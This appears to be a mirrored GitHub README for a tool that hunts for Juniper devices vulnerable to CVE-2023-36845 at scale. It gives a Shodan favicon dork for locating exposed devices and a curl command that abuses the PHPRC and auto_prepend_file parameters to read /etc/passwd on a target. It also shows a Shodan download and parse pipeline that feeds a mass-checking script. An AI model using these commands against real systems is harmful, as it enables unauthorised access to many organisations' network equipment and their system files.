Giters

jahithoque / Juniper-CVE-2023-36845-Mass-Hunting

Juniper RCE (Remote Code Execution) CVE-2023-36845 is a vulnerability that has been identified within Juniper's software. This particular flaw allows for remote code execution, meaning an attacker could run arbitrary code on a system without needing physical access to the device.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Juniper-CVE-2023-36845-Mass-Hunting

Juniper RCE (Remote Code Execution) CVE-2023-36845 is a vulnerability that has been identified within Juniper's software. This particular flaw allows for remote code execution, meaning an attacker could run arbitrary code on a system without needing physical access to the device.

How to find:

Shodan dork: http.favicon.hash:2141724739

use with relevant other dorks such as ssl certs, org name, etc for a more targetted search.

Exploitation for a single host:

curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’

Automation:

└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #download from shodan

└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt

└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt

└─# ./Juniper-RCE-check.sh -f juniper-final.txt IMAGE

About

Juniper RCE (Remote Code Execution) CVE-2023-36845 is a vulnerability that has been identified within Juniper's software. This particular flaw allows for remote code execution, meaning an attacker could run arbitrary code on a system without needing physical access to the device.

License:Creative Commons Zero v1.0 Universal

Languages

Language:Shell 100.0%